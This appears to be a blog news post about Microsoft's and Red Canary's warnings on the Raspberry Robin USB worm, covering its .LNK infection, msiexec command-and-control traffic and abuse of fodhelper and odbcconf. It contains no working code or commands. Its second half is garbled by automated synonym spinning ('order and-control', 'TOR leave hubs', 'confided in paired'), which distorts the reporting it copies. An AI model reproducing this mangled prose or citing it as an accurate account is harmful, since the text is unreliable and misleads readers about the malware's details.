Warning about Raspberry Robin malware that threatens Windows

Written By Eleman

Microsoft has announced that it has found a malware called ‘Raspberry Robin’ on the networks of hundreds of organizations from different industries. The giant company described this software as ‘high risk’ and warned users.

With the increasing use of the Internet, billions of people now spend most of their day online. However, it is a known fact that the cyber world has some scary aspects. Every day, we hear that malicious people are attacking cyber attacks or that defenses are being built against attacks.

Now, a warning has come from the US-based Microsoft, one of the largest technology companies in the world, about such an issue. The giant company made statements about a high-risk malware, which is described as a ‘worm’ and infects hundreds of Windows corporate networks.

Microsoft Announces Finding ‘High-Risk’ Malware Infecting Hundreds of Windows Devices


It is stated that this malware is named ‘Raspberry Robin’ and spreads via USB devices containing ‘.LNK’ file. According to the descriptions, this worm creates a msiexec.exe process via ‘Command Prompt’ at a user file and launches another malicious file. It is then stated that Raspberry Robin communicates with command and control servers via a short URL, and if the connection is successful, it downloads and installs a number of other malicious DLLs.

It should be noted that Raspberry Robin is not a new malware, it was first noticed by some cybersecurity experts in 2021. In addition, Microsoft states that it has seen evidence that this software was used even in 2019.

According to the news of Bleeping Computer, the giant company started to warn Defender for Endpoint subscribers about the dangers posed by Raspberry Robin, and stated that hundreds of organizations in multiple industries encountered worms in their Windows network.

New Raspberry Robin worm utilizes Windows Installer to drop malware

Red Canary knowledge examiners have found another Windows malware with worm capacities that spreads utilizing outside USB drives.

This malware is connected to a group of malignant action named Raspberry Robin and was first seen in September 2021 (online protection firm Sekoia tracks this malware as “QNAP worm”).

Red Canary’s Detection Engineering group distinguished the worm in different clients’ organizations, some in the innovation and assembling areas.

Raspberry Robin spreads to new Windows frameworks when a tainted USB drive containing a noxious .LNK record is associated.

When joined, the worm generates another cycle utilizing cmd.exe to send off a pernicious record put away on the tainted drive.

Windows genuine devices manhandled to introduce malware

It utilizes Microsoft Standard Installer (msiexec.exe) to contact its order and-control (C2) servers, possible facilitated on compromised QNAP gadgets and utilizing TOR leave hubs as extra C2 foundation.

“While msiexec.exe downloads and executes authentic installer bundles, enemies likewise influence it to convey malware,” the specialists said.

“Raspberry Robin utilizes msiexec.exe to endeavor outer organization correspondence to a vindictive space for C2 purposes.”

While they haven’t yet found on the off chance that it lays out constancy and through which strategies, they suspect that the malware introduces a pernicious DLL record [1, 2] on compromised machines to oppose expulsion between restarts.

Raspberry Robin dispatches this DLL with the assistance of two other real Windows utilities: fodhelper (a confided in paired for overseeing highlights in Windows settings) and odbcconf (a device for designing ODBC drivers).

The first permits it to sidestep User Account Control (UAC), while the subsequent will help execute and arrange the DLL.

Leave a Comment